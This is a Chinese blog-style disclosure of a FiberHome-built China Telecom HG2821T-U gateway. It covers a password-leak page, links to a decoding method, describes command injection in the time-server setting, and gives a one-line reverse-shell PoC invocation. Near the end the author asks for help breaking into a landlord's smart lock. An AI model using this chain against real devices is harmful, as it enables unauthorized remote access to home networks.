电信光猫HG2821T-U家庭网关代码执行反弹shell的PoC
2017年年中安装的电信光猫,18年年末又换了一次,听安装人员说是最新的光猫。8080端口存在一个烽火的后台管理系统,测试时发现一个密码信息泄露页面存在硬编码的认证口令,还碰巧发现一个代码执行漏洞。从配置文件来看,设备在全国各个省份都有使用。
虽然分配了公网地址,但是默认不会对外开放端口,所以漏洞没法远程利用。
其实是大概17年底发现的,前阵子突然发现关于这个光猫的帖子好多来了好多,发现漏洞还在就交了补天,结果审核通过之后,因为“原则”问题没有收,然后就顺道交了CNVD骗张证书。 其实危害不大,所以给大家测试玩玩。
漏洞其实是烽火开发的天翼带宽家庭网关的问题,所以其他型号的光猫其实不一定没有。
可以连接使用了这种光猫的公共场所的wifi(但是感觉商场应该不会用这种家用光猫)
这系统有个信息泄露直接将密码编码显示,在这个页面
http://192.168.x.1/cgi-bin/baseinfoSet.cgi
一开始没找着,隔了一阵子就发现有老大哥搞定了编码规则:
http://koolshare.cn/forum.php?mod=viewthread&tid=125090&highlight=hg2821
可以成功解密登陆,后来发现每一台光猫的密码都不一样(吐槽那位补天审核人员的“原则”问题)。 登陆后的设置时间页面,就能看到一个设置时间服务器的功能,测试一下就容易发现存在命令执行漏洞了。(看到过很多类似的文章,一时间找竟然找不着了。。)
python HG2821T-U_PoC.py http://192.168.x.1:8080 reverse_ip:reverse:port
效果图
最近房东装了智能门锁,但是太菜搞不进去,不知道有没有大师傅肯教教我。
当然,如果有老哥乐意加我扯淡吹牛也同样ojbk。
